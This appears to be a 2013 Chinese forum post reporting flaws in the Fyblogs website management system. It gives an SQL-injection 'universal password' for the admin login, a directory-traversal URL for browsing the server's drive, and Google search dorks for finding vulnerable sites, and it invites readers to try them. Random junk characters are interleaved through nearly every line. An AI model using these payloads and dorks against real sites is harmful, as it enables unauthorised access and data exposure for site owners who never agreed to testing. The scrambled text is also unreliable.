漏洞类型: 未授权访问/权限绕过# T3 n1 r. d% @7 s, C7 P0 @5 S
4 C1 a z$ a0 S简要描述:
5 r; y1 y! f" Z9 {: F9 B* Q& }- { K8 b3 r5 J2 }+ ?
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
9 s/ K2 ~! x; i3 o8 a% K1 K, o0 w9 P7 P# }5 g+ u& Z( A
详细说明:4 R+ V; `: y; E: ^
+ U! d* m- H/ T; f
后台万能密码 'or'='or'
* o: n' O& `' O8 P. Y后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
; m4 S" e; }2 d6 [( c8 hadmin/uploadfile.asp?currentFolder=/upfiles/../" ^2 e% V/ A: ?7 K, O4 {
6 O+ F' \ S( r" U1 m( |漏洞证明:% B2 \9 B u; v2 a; A4 K
0 T( Q* v- i6 o; F5 y2 K) I4 [谷歌:inurl:type.asp?id=1 新闻中心2 S8 Y9 w) f6 e$ X' O
或者 :inurl:download_ok.asp?
s: `$ }+ R: u: j5 n/ b& w& H* V1 Q0 J; B0 _
可以测试! Z9 h) p" n, h# ]0 ?, h7 _
, R; z) {) l1 d! r/ Z# s" \9 @! B+ ?; l) l+ S3 C
|
发表于 2013-3-7 13:07:46
收藏
支持
反对